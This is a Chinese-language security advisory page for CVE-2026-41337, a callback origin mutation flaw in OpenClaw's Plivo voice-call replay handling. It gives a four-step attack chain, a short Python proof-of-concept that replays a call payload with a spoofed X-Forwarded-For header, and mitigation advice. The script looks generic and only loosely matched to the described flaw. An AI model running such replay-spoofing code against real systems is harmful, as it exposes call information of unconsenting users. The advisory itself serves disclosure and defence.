CVE-2026-41337 CVSS 5.3 中危

CVE-2026-41337 OpenClaw回调源变异漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41337

漏洞类型

回调源变异

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.31 之前的版本中存在一个回调源变异漏洞，该漏洞位于 Plivo 语音通话重放功能中。攻击者可以利用此漏洞在系统拒绝重放之前，变异进程内的回调源。具体而言，如果攻击者能够捕获活跃通话的有效回调数据，便可以在重放过程中操纵回调源。此攻击无需认证且无需用户交互，通过网络即可发起，主要对信息的机密性构成威胁。

技术细节

该漏洞的核心在于 OpenClaw 处理 Plivo 语音回调时的验证逻辑缺陷。在正常流程中，系统应严格校验回调请求的来源以防止重放攻击。然而，在受影响版本中，当处理回调重放请求时，存在一个时间窗口或逻辑顺序错误，允许攻击者在系统执行“重放拒绝”检查之前修改进程内的回调源参数。攻击者首先需要嗅探或获取一个针对活跃通话的合法回调请求。随后，通过构造特定的数据包，攻击者可以篡改回调的源头信息。由于验证机制未能及时捕获这一变异，系统错误地接受了伪造的回调源。这可能导致敏感的通话信息被泄露给未授权的第三方，或者利用合法的回调上下文执行未授权操作。CVSS 3.1 评分为 5.3，属于中危漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者监听网络流量或利用其他方式，捕获一个针对 OpenClaw 系统中正在进行的有效 Plivo 语音通话的回调请求数据。

STEP 2

步骤2：变异构造

利用漏洞，攻击者在重放该捕获的请求数据之前，修改请求头或参数中的源地址信息（如变异回调源），试图绕过系统的重放拒绝检查。

STEP 3

步骤3：恶意重放

攻击者将变异后的回调请求发送到 OpenClaw 服务器。由于验证逻辑的缺陷，系统在拒绝重放前未能正确校验变异后的源信息。

STEP 4

步骤4：信息泄露

系统接受了变异后的回调，导致原本的通话上下文被泄露或劫持，攻击者可能获取到敏感的通话信息或导致逻辑错误。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-41337: OpenClaw Callback Origin Mutation
# This script demonstrates how an attacker might attempt to mutate the callback origin.

import requests

target_url = "http://target-openclaw-instance/api/plivo/callback"

# Simulated captured valid callback data for a live call
original_payload = {
    "CallUUID": "12345678-1234-1234-1234-123456789012",
    "From": "+1234567890",
    "To": "+0987654321",
    "Direction": "inbound"
}

# Headers simulating a legitimate request initially
headers = {
    "User-Agent": "Plivo",
    "Content-Type": "application/json"
}

# The vulnerability allows mutating the origin before replay rejection is checked.
# Attackers might modify the Host header or X-Forwarded-For if the logic relies on them.
malicious_headers = headers.copy()
malicious_headers["X-Forwarded-For"] = "192.168.1.100" # Mutating origin

print(f"Sending payload to {target_url} with mutated origin...")

try:
    response = requests.post(target_url, json=original_payload, headers=malicious_headers, timeout=5)
    if response.status_code == 200:
        print("[+] Request accepted, potential mutation successful.")
    else:
        print(f"[-] Request rejected with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界部署 Web 应用防火墙（WAF），规则需配置为检测并拦截异常的回调请求头或来源不明的重放请求。同时，建议暂时监控 Plivo 回调日志，查找来源异常的 200 OK 响应。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表